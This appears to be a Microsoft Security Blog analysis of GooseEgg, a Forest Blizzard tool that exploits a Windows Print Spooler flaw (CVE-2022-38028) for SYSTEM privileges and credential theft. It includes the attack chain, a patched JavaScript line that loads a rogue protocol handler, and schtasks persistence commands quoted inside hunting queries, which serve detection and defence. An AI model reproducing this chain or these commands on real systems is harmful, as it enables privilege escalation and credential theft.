To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Threat actors misusing Quick Assist in social engineering attacks leading to ransomware appeared first on Microsoft Security Blog.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397. Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the United States and United Kingdom governments, Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as Seashell Blizzard (IRIDIUM) and Cadet Blizzard (DEV-0586). Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare (CVE-2021-34527 and CVE-2021-1675), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the CVE-2022-38028 security update to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg.

This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts.

Who is Forest Blizzard?

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The United States and United Kingdom governments have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities.

GooseEgg

Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises.

Launch, persistence, and privilege escalation

Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name execute.bat and doit.bat. This batch script writes the file servtask.bat, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run servtask.bat.

The GooseEgg binary—which has included but is not limited to the file names justice.exe and DefragmentSrv.exe—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.

The first command issues a custom return code 0x6009F49F and exits; which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the whoami command.

Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “wayzgoose”; for example, wayzgoose23.dll. This DLL, as well as other components of the malware, are deployed to one of the following installation subdirectories, which is created under C:\ProgramData. A subdirectory name is selected from the list below:

• Microsoft
• Adobe
• Comms
• Intel
• Kaspersky Lab
• Bitdefender
• ESET
• NVIDIA
• UbiSoft
• Steam

A specially crafted subdirectory with randomly generated numbers and the format string \v%u.%02u.%04u is also created and serves as the install directory. For example, a directory that looks like C:\ProgramData\Adobe\v2.116.4405 may be created. The binary then copies the following driver stores to this directory:

• C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*
• C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*

Next, registry keys are created, effectively generating a custom protocol handler and registering a new CLSID to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the PrintSpooler attempts to load C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js, it instead is redirected to the actor-controlled directory containing the copied driver packages.

The “MPDW-constraints.js” stored within the actor-controlled directory has the following patch applied to the convertDevModeToPrintTicket function:

function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket)
{try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}

The above patch to the convertDevModeToPrintTicket function invokes the “rogue” search protocol handler’s CLSID during the call to RpcEndDocPrinter. This results in the auxiliary DLL wayzgoose.dll launching in the context of the PrintSpooler service with SYSTEM permissions. wayzgoose.dll is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.

Recommendations

Microsoft recommends the following mitigations defend against attacks that use GooseEgg.

Reduce the Print Spooler vulnerability

Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on October 11, 2022 and updates for PrintNightmare vulnerabilities on June 8, 2021 and July 1, 2021. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a built-in security assessment that tracks the availability of Print Spooler services on domain controllers.

Be proactively defensive

• For customers, follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
• Run Endpoint Detection and Response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.

•  Block credential stealing from the Windows local security authority subsystem (lsass.exe)

Detecting, hunting, and responding to GooseEgg

Microsoft Defender XDR detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• HackTool:Win64/GooseEgg

Microsoft Defender for Endpoint

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Possible exploitation of CVE-2021-34527
• Possible source of PrintNightmare exploitation
• Possible target of PrintNightmare exploitation attempt
• Potential elevation of privilege using print filter pipeline service
• Suspicious behavior by spoolsv.exe
• Forest Blizzard Actor activity detected

Microsoft Defender for Identity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Actor Profile: Forest Blizzard
• Abuse of Windows Print Spooler for privilege escalation and persistence

Hunting queries

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Hunt for filenames, file extensions in ProgramData folder and file hash

let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);
DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath == "C:\\ProgramData\\"
  | where FileName in~ (filenames) or FileName endswith ".save" or FileName endswith ".zip" or ( FileName startswith "wayzgoose" and FileName endswith ".dll") or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat
  | project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName,InitiatingProcessAccountUpn

Hunt for processes creating scheduled task creation

DeviceProcessEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" //hash value of justice.exe
or InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" //hash value of DefragmentSrv.exe
or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
| project TimeGenerated, AccountName,AccountUpn,ActionType, DeviceId, DeviceName,FolderPath, FileName

Hunt for JavaScript constrained file

DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
  | where FileName endswith ".js" or FileName == "MPDW-constraints.js"

Hunt for creation of registry key / value events

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
  | where RegistryValueName has "(Default)"
  | where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"

 Hunt for custom protocol handler

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"
  | where RegistryValueName has "CLSID"
  | where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"

Indicators of compromise

Batch script artifacts:

• execute.bat
• doit.bat
• servtask.bat
• 7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9

GooseEgg artifacts:

• justice.pdb
• wayzgoose.pdb

References

• https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675
• https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials appeared first on Microsoft Security Blog.